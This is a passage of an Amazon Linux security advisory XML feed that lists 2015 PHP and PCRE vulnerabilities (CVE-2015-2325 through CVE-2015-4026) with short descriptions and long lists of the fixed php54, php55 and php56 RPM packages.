</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2325" title="" id="CVE-2015-2325" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2326" title="" id="CVE-2015-2326" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4021" title="" id="CVE-2015-4021" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4022" title="" id="CVE-2015-4022" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4024" title="" id="CVE-2015-4024" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4025" title="" id="CVE-2015-4025" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4026" title="" id="CVE-2015-4026" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-intl" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.41" 
release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package 
name="php54-recode" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.41" release="1.69.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php54-mbstring-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.41" release="1.69.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-bcmath-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.41" release="1.69.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-debuginfo-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.41-1.69.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-535</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-535: medium priority package update for php55</title><issued date="2015-06-02 22:21:00" /><updated date="2015-06-02 22:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4026:
It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.
1223422:
CVE-2015-4026 php: pcntl_exec() accepts paths with NUL character
CVE-2015-4025:
It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.
1223408:
CVE-2015-4025 php: CVE-2006-7243 regressions in 5.4+
CVE-2015-4024:
A flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time.
1222485:
CVE-2015-4024 php: multipart/form-data request parsing CPU usage DoS
CVE-2015-4022:
An integer overflow flaw leading to a heap-based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code.
1223412:
CVE-2015-4022 php: integer overflow on reading FTP server data leading to heap overflow
1223412:
CVE-2015-4022 php: integer overflow leading to heap overflow when reading FTP file listing
CVE-2015-4021:
An integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.
1223425:
CVE-2015-4021 php: memory corruption in phar_parse_tarfile when entry filename starts with NULL
1223425:
CVE-2015-4021 php: memory corruption in phar_parse_tarfile caused by empty entry file name
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4021" title="" id="CVE-2015-4021" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4022" title="" id="CVE-2015-4022" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4024" title="" id="CVE-2015-4024" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4025" title="" id="CVE-2015-4025" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4026" title="" id="CVE-2015-4026" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-mbstring" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.25" release="1.101.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-enchant-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package 
name="php55-dba" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.25" release="1.101.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-mcrypt-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.25" release="1.101.amzn1" 
epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.25" 
release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.25-1.101.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-536</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-536: important priority package update for php56</title><issued date="2015-06-02 22:22:00" /><updated date="2015-06-02 22:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4026:
It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.
1223422:
CVE-2015-4026 php: pcntl_exec() accepts paths with NUL character
CVE-2015-4025:
It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.
1223408:
CVE-2015-4025 php: CVE-2006-7243 regressions in 5.4+
CVE-2015-4024:
A flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time.
1222485:
CVE-2015-4024 php: multipart/form-data request parsing CPU usage DoS
CVE-2015-4022:
An integer overflow flaw leading to a heap-based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code.
1223412:
CVE-2015-4022 php: integer overflow on reading FTP server data leading to heap overflow
1223412:
CVE-2015-4022 php: integer overflow leading to heap overflow when reading FTP file listing
CVE-2015-4021:
An integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.
1223425:
CVE-2015-4021 php: memory corruption in phar_parse_tarfile when entry filename starts with NULL
1223425:
CVE-2015-4021 php: memory corruption in phar_parse_tarfile caused by empty entry file name
CVE-2015-2326:
1207202:
CVE-2015-2326 pcre: heap buffer overflow in pcre_compile2()
CVE-2015-2325:
1207198:
CVE-2015-2325 pcre: heap buffer overflow in compile_branch()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2325" title="" id="CVE-2015-2325" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2326" title="" id="CVE-2015-2326" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4021" title="" id="CVE-2015-4021" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4022" title="" id="CVE-2015-4022" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4024" title="" id="CVE-2015-4024" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4025" title="" id="CVE-2015-4025" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4026" title="" id="CVE-2015-4026" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-enchant" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56" 
version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.9" release="1.112.amzn1" epoch="0" 